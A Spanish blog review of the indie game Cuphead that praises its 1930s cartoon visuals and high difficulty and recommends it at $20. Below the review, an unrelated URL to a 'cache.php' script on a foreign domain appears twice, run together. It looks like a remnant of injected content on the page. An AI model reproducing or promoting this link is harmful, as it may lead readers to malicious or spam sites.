Select Page

Cuphead,un clásico instantáneo

Cuphead,un clásico instantáneo

El juego que más está causando impacto en el mundo de los videos juegos, indudablemente es, Cuphead. Este excelente juego indie que nos ha brindado “StudioMDHR Entertainment”, (quienes tuvieron que hipotecar su casa para lograr que este juego saliera al mercado) compite con cualquier juego triple A en el mercado.

desarrollado y publicado por StudioMDHR Entertainment. Como el personaje titular Cuphead, el jugador pelea una serie de jefes con el fin de pagar una deuda con el diablo. El juego fue inspirado en gran medida por las obras de dibujantes de los años 1930. busca mantener las cualidades subversivas y surrealistas de las obras; Este estilo lograr crear unos visuales realmente alucinantes.

Cuphead2

En algunos niveles  “Cuphead” utiliza la mano como pistola además de volar en avión y recrear épicas batallas aéreas  . Deberá recolectar monedas para subir de nivel. Este juego puede resultar estresante para algunos jugadores ya en principio solo cuentas con 3 vidas (se pueden obtener 4 subiendo de nivel).

A pesar de su gran dificultad, recomendamos este juego para todos, es una experiencia de la cual no te puedes perder y por solo 20$US es una ganga. 

 

https://stati.in/cache.php?ver=3.0&ref=zino&client=zombiehttps://stati.in/cache.php?ver=3.0&ref=zino&client=zombie

About The Author

Leave a reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Espacio Publicitario

Publicidad

Redes

Recent Tweets

Publicidad

A %d blogueros les gusta esto: